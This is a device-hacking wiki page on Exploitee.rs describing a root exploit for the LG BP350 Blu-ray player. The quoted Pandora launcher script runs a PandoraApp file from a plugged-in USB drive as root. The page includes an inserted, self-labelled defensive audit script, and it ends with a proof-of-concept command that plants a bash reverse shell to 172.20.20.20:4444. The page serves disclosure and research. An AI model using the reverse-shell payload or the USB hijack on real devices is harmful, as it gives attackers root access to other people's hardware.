LG BP350

From Exploitee.rs
Revision as of 04:42, 6 August 2017 by 0x00string (talk | contribs)

"Although the information we release has been verified and shown to work to the best of our knowledge, we can't be held accountable for bricked devices or roots gone wrong."

"Enjoy TV shows, movies and more with this LG BP350 Blu-ray player, which features built-in Wi-Fi for access to Netflix, YouTube, Hulu Plus and other content. Blu-ray Disc and DVD playback in up to 1080p resolution enables a high-definition experience."

Purchase

Buying devices is expensive and, in a lot of cases, our testing leads to bricked equipment. If you would like to help support our group, site, and research, please use one of the links below to purchase your next device.

Purchase the LG BP350 Blu-ray Player at Amazon

App Launcher Script Hijack

The LG BP350 includes an optional Pandora Internet Radio app. Once the app is installed, its launcher script (shown below) introduces a vulnerability: before running the PandoraApp binary from the local filesystem, it checks for a file of the same name at the paths where USB volumes are mounted and executes that file instead if it exists. By creating a script named PandoraApp, placing it in the root of a flash drive, and plugging the drive into the set-top box, any arbitrary script can be executed with root privileges.

cat /mnt/rootfs_normal/usr/local/bin/pandora/pandora.sh
#!/bin/sh
#

echo "Enter pandora.sh"
echo "Call pandorastub" $PWD

export QT_QWS_FONTDIR=/usr/share/font
echo "pandora font path = " $QT_QWS_FONTDIR

export QT_PLUGIN_PATH=/plugins
echo "QT_PLUGIN_PATH =$QT_PLUGIN_PATH"

if [ -e /mnt/sda1/PandoraApp ]; then
    echo "/mnt/sda1/PandoraApp -qws -display directfb"
    /mnt/sda1/PandoraApp -qws -display directfb
elif [ -e /mnt/sdb1/PandoraApp ]; then
    echo "/mnt/sdb1/PandoraApp -qws -display directfb"
    /mnt/sdb1/PandoraApp -qws -display directfb
else
    echo "pandora not for vosd"
    echo "/usr/local/bin/pandora/PandoraApp -qws -display directfb"
    /usr/local/bin/pandora/PandoraApp -qws -display directfb 
fi
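
The pattern in this launcher (running a program directly from a USB mount point) can be searched for across an unpacked firmware image. The following is an added example, not part of the original page or the vendor's code; the function names are hypothetical and it assumes USB volumes mount at /mnt/sd<letter><digit> as in pandora.sh. The sample tree it builds is constructed and includes a hardened launcher for comparison.

```shell
#!/bin/sh
# Added example, not from the original page: audit an unpacked root filesystem
# for scripts that run a program straight from a USB mount point.
# Assumption: removable volumes mount at /mnt/sd<letter><digit>, as in pandora.sh.

# Matches a line whose command word (optionally after exec, ".", sh or bash) is
# a path under a USB mount. Existence tests like `[ -e /mnt/sda1/x ]` and echo
# lines do not match, because there the path is not the command being run.
USB_EXEC_RE='^[[:space:]]*((exec|\.|source|sh|bash)[[:space:]]+)?/mnt/sd[a-z][0-9]+/[^[:space:]]+'

# find_usb_exec ROOT: print "file:line:text" for every matching line.
find_usb_exec() {
    # -I skips binary files, -H always prints the file name, -n the line number.
    find "$1" -type f -exec grep -IHnE "$USB_EXEC_RE" {} + 2>/dev/null || true
}

# count_usb_exec ROOT: number of matching lines under ROOT.
count_usb_exec() {
    find_usb_exec "$1" | wc -l | tr -d ' '
}

# make_sample_rootfs DIR: build a small constructed tree to run the audit on.
make_sample_rootfs() {
    mkdir -p "$1/usr/local/bin/pandora" "$1/usr/local/bin/fixed"
    # Launcher shaped like the one shown on this page (echo/export lines omitted).
    cat > "$1/usr/local/bin/pandora/pandora.sh" <<'EOF'
#!/bin/sh
if [ -e /mnt/sda1/PandoraApp ]; then
    /mnt/sda1/PandoraApp -qws -display directfb
elif [ -e /mnt/sdb1/PandoraApp ]; then
    /mnt/sdb1/PandoraApp -qws -display directfb
else
    /usr/local/bin/pandora/PandoraApp -qws -display directfb
fi
EOF
    # Hardened form: only the copy on the local filesystem is ever executed.
    cat > "$1/usr/local/bin/fixed/pandora.sh" <<'EOF'
#!/bin/sh
exec /usr/local/bin/pandora/PandoraApp -qws -display directfb
EOF
}

# Usage: sh audit.sh /path/to/unpacked/rootfs
if [ "$#" -ge 1 ]; then find_usb_exec "$1"; fi
```

On the constructed tree, the audit reports the two USB execution lines in the original-style launcher and nothing for the hardened one.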

POC

The following command writes a file to a flash drive that will spawn a reverse TCP shell and then proceed to execute the Pandora app normally.

printf "/bin/bash -i >& /dev/tcp/172.20.20.20/4444 0>&1; /usr/local/bin/pandora/PandoraApp -qws -display directfb;" > /dev/yourflashdrive/PandoraApp